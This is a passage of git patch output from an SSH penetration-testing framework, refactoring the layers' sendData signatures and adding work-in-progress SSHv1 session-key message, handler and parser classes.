.../rub/nds/sshattacker/core/layer/impl/TcpLayer.java | 1 - .../sshattacker/core/workflow/chooser/Chooser.java | 2 -- .../core/workflow/chooser/DefaultChooser.java | 11 ----------- 4 files changed, 24 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index 42831abad..9838a7dad 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -250,16 +250,6 @@ public PacketCipher getActiveDecryptCipher() { /** If set to true, a version exchange message was sent by each side */ private boolean versionExchangeCompleted = false; - public byte[] getLastHandledAuthenticationMessageData() { - return lastHandledApplicationMessageData; - } - - public void setLastHandledApplicationMessageData(byte[] lastHandledApplicationMessageData) { - this.lastHandledApplicationMessageData = lastHandledApplicationMessageData; - } - - private byte[] lastHandledApplicationMessageData; - // region Constructors and Initalization public SshContext() { this(new Context(new Config())); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java index d8040d7da..d06ea4023 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java @@ -121,7 +121,6 @@ public HintedInputStream getDataStream() throws IOException { @Override public LayerProcessingResult receiveData() { - LOGGER.debug("TCP-Layer ist Recieving Data now"); return new LayerProcessingResult(null, getLayerType(), true); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java index cad7ea33c..b7d63d38f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/Chooser.java @@ -124,8 +124,6 @@ public Context getContext() { public abstract ConnectionEndType getMyConnectionPeer(); - public abstract byte[] getLastHandledAuthenticationMessageData(); - /** * Returns the encryption algorithm for outgoing packets (send). Internally, this either calls * getEncryptionAlgorithmClientToServer() or getEncryptionAlgorithmServerToClient(), depending diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java index 95b1ad09e..2595efb54 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java @@ -18,7 +18,6 @@ import de.rub.nds.sshattacker.core.state.Context; import de.rub.nds.tlsattacker.transport.Connection; import de.rub.nds.tlsattacker.transport.ConnectionEndType; -import java.nio.charset.StandardCharsets; import java.util.Arrays; import java.util.List; import java.util.Map; @@ -596,16 +595,6 @@ public ConnectionEndType getMyConnectionPeer() { : ConnectionEndType.CLIENT; } - @Override - public byte[] getLastHandledAuthenticationMessageData() { - if (context.getSshContext().getLastHandledAuthenticationMessageData() != null) { - return copy(context.getSshContext().getLastHandledAuthenticationMessageData()); - } else { - return config.getDefaultAuthenticationMessageData() - .getBytes(StandardCharsets.ISO_8859_1); - } - } - private byte[] copy(byte[] array) { return org.bouncycastle.util.Arrays.copyOf(array, array.length); } From 6647b3b3c3548303a7000e900555a70854ba2140 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Mon, 14 Aug 2023 22:07:26 +0200 Subject: [PATCH 065/176] Remove hint from sendData --- .../sshattacker/core/layer/ProtocolLayer.java | 3 +-- .../core/layer/impl/PacketLayer.java | 14 +++-------- .../core/layer/impl/SSH1Layer.java | 3 +-- .../core/layer/impl/SSH2Layer.java | 25 ++----------------- .../sshattacker/core/layer/impl/TcpLayer.java | 3 +-- 5 files changed, 9 insertions(+), 39 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java index 7b3f71795..9ec53f35f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java @@ -76,8 +76,7 @@ public void setLowerLayer(ProtocolLayer lowerLayer) { public abstract LayerProcessingResult sendConfiguration() throws IOException; - public abstract LayerProcessingResult sendData(HintT hintT, byte[] additionalData) - throws IOException; + public abstract LayerProcessingResult sendData(byte[] additionalData) throws IOException; public LayerConfiguration getLayerConfiguration() { return layerConfiguration; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index 2591053b0..ed141253a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -86,7 +86,7 @@ public LayerProcessingResult sendConfiguration() throws IOException { byte[] serializedMessage = serializer.serialize(); LayerProcessingResult layerProcessingResult = - getLowerLayer().sendData(null, serializedMessage); + getLowerLayer().sendData(serializedMessage); } catch (IOException e) { LOGGER.warn("Error while sending packet: " + e.getMessage()); @@ -98,16 +98,10 @@ public LayerProcessingResult sendConfiguration() throws IOException { } @Override - public LayerProcessingResult sendData( - PacketLayerHint hint, byte[] additionalData) throws IOException { + public LayerProcessingResult sendData(byte[] additionalData) + throws IOException { MessageIdConstant type = MessageIdConstant.UNKNOWN; - if (hint != null) { - type = hint.getType(); - } else { - LOGGER.warn( - "Sending record without a LayerProcessing hint. Using \"UNKNOWN\" as the type"); - } AbstractPacket packet; if (context.getPacketLayerType() == PacketLayerType.BLOB) { @@ -125,7 +119,7 @@ public LayerProcessingResult sendData( List packets = new LinkedList<>(); packets.add(packet); - getLowerLayer().sendData(null, serializedMessage); + getLowerLayer().sendData(serializedMessage); return new LayerProcessingResult<>(packets, getLayerType(), true); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index ec55b66b8..8449619c7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -69,8 +69,7 @@ public LayerProcessingResult sendConfiguration() throws IOException { } @Override - public LayerProcessingResult sendData(LayerProcessingHint hint, byte[] additionalData) - throws IOException { + public LayerProcessingResult sendData(byte[] additionalData) throws IOException { return sendConfiguration(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 4968a8b2b..60dfdf17b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -49,23 +49,6 @@ public SSH2Layer(SshContext context) { this.context = context; } - private void flushCollectedMessages( - MessageIdConstant runningProtocolMessageType, ByteArrayOutputStream byteStream) - throws IOException { - - LOGGER.debug( - "[bro] Sending the following {} on {}", - byteStream.toByteArray(), - getLowerLayer().getLayerType()); - if (byteStream.size() > 0) { - getLowerLayer() - .sendData( - new PacketLayerHint(runningProtocolMessageType), - byteStream.toByteArray()); - byteStream.reset(); - } - } - @Override public LayerProcessingResult sendConfiguration() throws IOException { LayerConfiguration configuration = getLayerConfiguration(); @@ -90,10 +73,7 @@ public LayerProcessingResult sendConfiguration() throws IOException { processMessage(message, collectedMessageStream); addProducedContainer(message); // flushCollectedMessages(runningProtocolMessageType, collectedMessageStream); - getLowerLayer() - .sendData( - new PacketLayerHint(runningProtocolMessageType), - collectedMessageStream.toByteArray()); + getLowerLayer().sendData(collectedMessageStream.toByteArray()); ProtocolMessageHandler handler = message.getHandler(context); if (handler instanceof MessageSentHandler) { @@ -130,8 +110,7 @@ private void processMessage( } @Override - public LayerProcessingResult sendData(LayerProcessingHint hint, byte[] additionalData) - throws IOException { + public LayerProcessingResult sendData(byte[] additionalData) throws IOException { return sendConfiguration(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java index d06ea4023..d7a1d361a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/TcpLayer.java @@ -54,8 +54,7 @@ public LayerProcessingResult sendConfiguration() throws IOException { /** Sends data over the TCP socket. */ @Override - public LayerProcessingResult sendData(LayerProcessingHint hint, byte[] data) - throws IOException { + public LayerProcessingResult sendData(byte[] data) throws IOException { TcpTransportHandler handler = getTransportHandler(); handler.sendData(data); return new LayerProcessingResult(null, getLayerType(), true); // Not implemented From 193f9a76dcb615cf61e859ce413014d6705bb91d Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Wed, 16 Aug 2023 08:58:31 +0200 Subject: [PATCH 066/176] wip-interim: start wich SessionKeyMessage --- .../core/layer/context/SshContext.java | 39 +++++ .../ClientSessionKeyMessageHandler.java | 130 ++++++++++++++ .../ServerPublicKeyMessageHandler.java | 7 + .../ssh1/message/ClientSessionKeyMessage.java | 124 ++++++++++++++ .../ssh1/message/ServerPublicKeyMessage.java | 2 +- .../parser/ClientSessionKeyMessageParser.java | 158 ++++++++++++++++++ .../ClientSessionKeyMessagePreparator.java | 59 +++++++ .../ClientSessionKeyMessageSerializer.java | 43 +++++ 8 files changed, 561 insertions(+), 1 deletion(-) create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ClientSessionKeyMessageParser.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java create mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/ClientSessionKeyMessageSerializer.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java index b8ce48dcd..3c2e9c140 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/context/SshContext.java @@ -7,6 +7,7 @@ */ package de.rub.nds.sshattacker.core.layer.context; +import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.sshattacker.core.config.Config; import de.rub.nds.sshattacker.core.constants.*; import de.rub.nds.sshattacker.core.crypto.hash.ExchangeHashInputHolder; @@ -259,6 +260,12 @@ public PacketCipher getActiveDecryptCipher() { private KeySet keySet; private byte[] sshv1SessionID; + + private byte[] antiSpoofingCookie; + + private List chosenProtocolFlags; + private CipherMethod chosenCipherMethod; + private AuthenticationMethodSSHv1 chosenAuthenticationMethod; // endregion /* public MessageLayer getMessageLayer() { @@ -1055,4 +1062,36 @@ public byte[] getSshv1SessionID() { public void setSshv1SessionID(byte[] sshv1SessionID) { this.sshv1SessionID = sshv1SessionID; } + + public byte[] getAntiSpoofingCookie() { + return antiSpoofingCookie; + } + + public void setAntiSpoofingCookie(byte[] antiSpoofingCookie) { + this.antiSpoofingCookie = antiSpoofingCookie; + } + + public List getChosenProtocolFlags() { + return chosenProtocolFlags; + } + + public void setChosenProtocolFlags(List chosenProtocolFlags) { + this.chosenProtocolFlags = chosenProtocolFlags; + } + + public CipherMethod getChosenCipherMethod() { + return chosenCipherMethod; + } + + public void setChosenCipherMethod(CipherMethod chosenCipherMethod) { + this.chosenCipherMethod = chosenCipherMethod; + } + + public AuthenticationMethodSSHv1 getChosenAuthenticationMethod() { + return chosenAuthenticationMethod; + } + + public void setChosenAuthenticationMethod(AuthenticationMethodSSHv1 chosenAuthenticationMethod) { + this.chosenAuthenticationMethod = chosenAuthenticationMethod; + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java new file mode 100644 index 000000000..32812656f --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ClientSessionKeyMessageHandler.java @@ -0,0 +1,130 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.nio.charset.StandardCharsets; +import java.security.MessageDigest; +import java.security.NoSuchAlgorithmException; + +public class ClientSessionKeyMessageHandler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ClientSessionKeyMessageHandler(SshContext context) { + super(context); + } + + /*public HybridKeyExchangeReplyMessageHandler( + SshContext context, HybridKeyExchangeReplyMessage message) { + super(context, message); + }*/ + + @Override + public void adjustContext(ClientSessionKeyMessage message) { + + + + + // KeyExchangeUtil.handleHostKeyMessage(sshContext, message); + // setRemoteValues(message); + /* sshContext.getChooser().getHybridKeyExchange().combineSharedSecrets(); + sshContext.setSharedSecret( + sshContext.getChooser().getHybridKeyExchange().getSharedSecret()); + sshContext + .getExchangeHashInputHolder() + .setSharedSecret(sshContext.getChooser().getHybridKeyExchange().getSharedSecret()); + KeyExchangeUtil.computeExchangeHash(sshContext); + */ + /* KeyExchangeUtil.handleExchangeHashSignatureMessage(sshContext, message);*/ + /* + KeyExchangeUtil.setSessionId(sshContext); + KeyExchangeUtil.generateKeySet(sshContext);*/ + } + + /*private void setRemoteValues(ServerPublicKeyMessage message) { + sshContext + .getChooser() + .getHybridKeyExchange() + .getKeyAgreement() + .setRemotePublicKey(message.getPublicKey().getValue()); + LOGGER.info( + "RemoteKey Agreement = " + + ArrayConverter.bytesToRawHexString(message.getPublicKey().getValue())); + sshContext + .getChooser() + .getHybridKeyExchange() + .getKeyEncapsulation() + .setEncryptedSharedSecret(message.getCombinedKeyShare().getValue()); + LOGGER.info( + "Ciphertext Encapsulation = " + + ArrayConverter.bytesToRawHexString( + message.getCombinedKeyShare().getValue())); + byte[] combined; + switch (sshContext.getChooser().getHybridKeyExchange().getCombiner()) { + case CLASSICAL_CONCATENATE_POSTQUANTUM: + combined = + KeyExchangeUtil.concatenateHybridKeys( + message.getPublicKey().getValue(), + message.getCombinedKeyShare().getValue()); + sshContext.getExchangeHashInputHolder().setHybridServerPublicKey(combined); + break; + case POSTQUANTUM_CONCATENATE_CLASSICAL: + combined = + KeyExchangeUtil.concatenateHybridKeys( + message.getCombinedKeyShare().getValue(), + message.getPublicKey().getValue()); + sshContext.getExchangeHashInputHolder().setHybridServerPublicKey(combined); + break; + default: + LOGGER.warn( + "Combiner" + + sshContext.getChooser().getHybridKeyExchange().getCombiner() + + " is not supported."); + break; + } + }*/ + + /*@Override + public SshMessageParser getParser(byte[] array) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new HybridKeyExchangeReplyMessageParser( + array, kex.getCombiner(), kex.getPkAgreementLength(), kex.getCiphertextLength()); + } + + @Override + public SshMessageParser getParser( + byte[] array, int startPosition) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new HybridKeyExchangeReplyMessageParser( + array, + startPosition, + kex.getCombiner(), + kex.getPkAgreementLength(), + kex.getCiphertextLength()); + } + + @Override + public SshMessagePreparator getPreparator() { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new HybridKeyExchangeReplyMessagePreparator( + context.getChooser(), message, kex.getCombiner()); + } + + @Override + public SshMessageSerializer getSerializer() { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new HybridKeyExchangeReplyMessageSerializer(message, kex.getCombiner()); + }*/ +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java index d442c3343..1cc30ca14 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ServerPublicKeyMessageHandler.java @@ -47,6 +47,13 @@ public void adjustContext(ServerPublicKeyMessage message) { throw new RuntimeException(e); } + sshContext.setServerKey(message.getServerKey()); + sshContext.setHostKey(message.getHostKey()); + sshContext.setAntiSpoofingCookie(message.getAntiSpoofingCookie().getValue()); + //TODO: Choose correct CipherMethod + + //TODO: Choose correct AuthenticationMethod + // KeyExchangeUtil.handleHostKeyMessage(sshContext, message); // setRemoteValues(message); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java new file mode 100644 index 000000000..bee9ba3a2 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ClientSessionKeyMessage.java @@ -0,0 +1,124 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.constants.AuthenticationMethodSSHv1; +import de.rub.nds.sshattacker.core.constants.CipherMethod; +import de.rub.nds.sshattacker.core.constants.ProtocolFlag; +import de.rub.nds.sshattacker.core.crypto.kex.HybridKeyExchange; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ClientSessionKeyMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ClientSessionKeyMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ClientSessionKeyMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ClientSessionKeyMessageSerializer; + +import java.io.InputStream; +import java.util.List; + +public class ClientSessionKeyMessage extends SshMessage { + + private CipherMethod chosenCipherMethod; + private ModifiableByteArray antiSpoofingCookie; + private ModifiableByteArray sshv1SessionID; + private ModifiableByteArray encryptedSessioKey; + private ModifiableByteArray plaintextSessioKey; + private List chosenProtocolFlags; + private ModifiableInteger protocolFlagMask; + + public CipherMethod getChosenCipherMethod() { + return chosenCipherMethod; + } + + public void setChosenCipherMethod(CipherMethod chosenCipherMethod) { + this.chosenCipherMethod = chosenCipherMethod; + } + + public ModifiableByteArray getAntiSpoofingCookie() { + return antiSpoofingCookie; + } + + public void setAntiSpoofingCookie(ModifiableByteArray antiSpoofingCookie) { + this.antiSpoofingCookie = antiSpoofingCookie; + } + + public void setAntiSpoofingCookie(byte[] antiSpoofingCookie) { + this.antiSpoofingCookie = ModifiableVariableFactory.safelySetValue(this.antiSpoofingCookie,antiSpoofingCookie); + } + + + public ModifiableByteArray getEncryptedSessioKey() { + return encryptedSessioKey; + } + + public void setEncryptedSessioKey(ModifiableByteArray encryptedSessioKey) { + this.encryptedSessioKey = encryptedSessioKey; + } + + public ModifiableByteArray getPlaintextSessioKey() { + return plaintextSessioKey; + } + + public void setPlaintextSessioKey(ModifiableByteArray plaintextSessioKey) { + this.plaintextSessioKey = plaintextSessioKey; + } + + public List getChosenProtocolFlags() { + return chosenProtocolFlags; + } + + public void setChosenProtocolFlags(List chosenProtocolFlags) { + this.chosenProtocolFlags = chosenProtocolFlags; + } + + public ModifiableInteger getProtocolFlagMask() { + return protocolFlagMask; + } + + public void setProtocolFlagMask(ModifiableInteger protocolFlagMask) { + this.protocolFlagMask = protocolFlagMask; + } + + @Override + public ClientSessionKeyMessageHandler getHandler(SshContext context) { + return new ClientSessionKeyMessageHandler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new ClientSessionKeyMessageParser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new ClientSessionKeyMessagePreparator(context.getChooser(), this, kex.getCombiner()); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + HybridKeyExchange kex = context.getChooser().getHybridKeyExchange(); + return new ClientSessionKeyMessageSerializer(this, kex.getCombiner()); + } + + @Override + public String toShortString() { + return "CMSG_SESSION_KEY"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java index 927615f61..69bf84c13 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ServerPublicKeyMessage.java @@ -324,6 +324,6 @@ public SshMessageSerializer getSerializer(SshContext con @Override public String toShortString() { - return "HYB_KEX_REPL"; + return "SMGS_PUBLIC_KEY"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ClientSessionKeyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ClientSessionKeyMessageParser.java new file mode 100644 index 000000000..ae918883c --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/ClientSessionKeyMessageParser.java @@ -0,0 +1,158 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.constants.*; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; +import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; +import java.math.BigInteger; +import java.util.ArrayList; +import java.util.List; + +public class ClientSessionKeyMessageParser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + private HybridKeyExchangeCombiner combiner; + private int agreementSize; + private int encapsulationSize; + + /* + public HybridKeyExchangeReplyMessageParser( + byte[] array, + int startPosition, + HybridKeyExchangeCombiner combiner, + int agreementSize, + int encapsulationSize) { + super(array, startPosition); + this.agreementSize = agreementSize; + this.encapsulationSize = encapsulationSize; + this.combiner = combiner; + } + + public HybridKeyExchangeReplyMessageParser( + byte[] array, + HybridKeyExchangeCombiner combiner, + int agreementSize, + int encapsulationSize) { + super(array); + this.agreementSize = agreementSize; + this.encapsulationSize = encapsulationSize; + this.combiner = combiner; + } + */ + + public ClientSessionKeyMessageParser(SshContext context, InputStream stream) { + super(stream); + + /* LOGGER.info( + "Negotiated Hybrid Key Exchange: " + + context.getChooser().getKeyExchangeAlgorithm()); + switch (context.getChooser().getKeyExchangeAlgorithm()) { + default: + LOGGER.warn( + "Unsupported hybrid key exchange negotiated, treating received HBR_REPLY as sntrup761x25519-sha512@openssh.com"); + // Fallthrough to next case statement intended + case SNTRUP761_X25519: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.X25519_POINT_SIZE; + this.encapsulationSize = CryptoConstants.SNTRUP761_CIPHERTEXT_SIZE; + break; + case CURVE25519_FRODOKEM1344: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.X25519_POINT_SIZE; + this.encapsulationSize = CryptoConstants.FRODOKEM1344_CIPHERTEXT_SIZE; + break; + case SNTRUP4591761_X25519: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.X25519_POINT_SIZE; + this.encapsulationSize = CryptoConstants.SNTRUP4591761_CIPHERTEXT_SIZE; + break; + case NISTP521_FIRESABER: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.NISTP521_POINT_SIZE; + this.encapsulationSize = CryptoConstants.FIRESABER_CIPHERTEXT_SIZE; + break; + case NISTP521_KYBER1024: + this.combiner = HybridKeyExchangeCombiner.POSTQUANTUM_CONCATENATE_CLASSICAL; + this.agreementSize = CryptoConstants.NISTP521_POINT_SIZE; + this.encapsulationSize = CryptoConstants.KYBER1024_CIPHERTEXT_SIZE; + break; + }*/ + + /* this.agreementSize = agreementSize; + this.encapsulationSize = encapsulationSize; + this.combiner = combiner;*/ + } + + + + + private void parseCRC(ClientSessionKeyMessage message) { + byte[] CRC = parseByteArrayField(4); + LOGGER.debug("CRC: {}", CRC); + } + + /* private void parseHybridKey(ServerPublicKeyMessage message) { + int length = parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH); + LOGGER.debug("Total Length: " + length); + + switch (combiner) { + case CLASSICAL_CONCATENATE_POSTQUANTUM: + message.setPublicKeyLength(agreementSize); + message.setPublicKey(parseByteArrayField(agreementSize)); + message.setCiphertextLength(encapsulationSize); + message.setCombinedKeyShare(parseByteArrayField(encapsulationSize)); + break; + case POSTQUANTUM_CONCATENATE_CLASSICAL: + message.setCiphertextLength(encapsulationSize); + message.setCombinedKeyShare(parseByteArrayField(encapsulationSize)); + message.setPublicKeyLength(agreementSize); + message.setPublicKey(parseByteArrayField(agreementSize)); + break; + default: + LOGGER.warn("combiner not supported. Can not update message"); + break; + } + }*/ + + /* private void parseSignature(ServerPublicKeyMessage message) { + message.setSignatureLength(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); + LOGGER.debug("Signature length: " + message.getSignatureLength().getValue()); + message.setSignature(parseByteArrayField(message.getSignatureLength().getValue())); + LOGGER.debug("Signature: " + message.getSignature()); + }*/ + + @Override + protected void parseMessageSpecificContents(ClientSessionKeyMessage message) { + parseCRC(message); + + // parseHybridKey(message); + // parseSignature(message); + } + + /* + @Override + protected HybridKeyExchangeReplyMessage createMessage() { + return new HybridKeyExchangeReplyMessage(); + } + */ + + @Override + public void parse(ClientSessionKeyMessage message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java new file mode 100644 index 000000000..bc31bf5f1 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/ClientSessionKeyMessagePreparator.java @@ -0,0 +1,59 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package 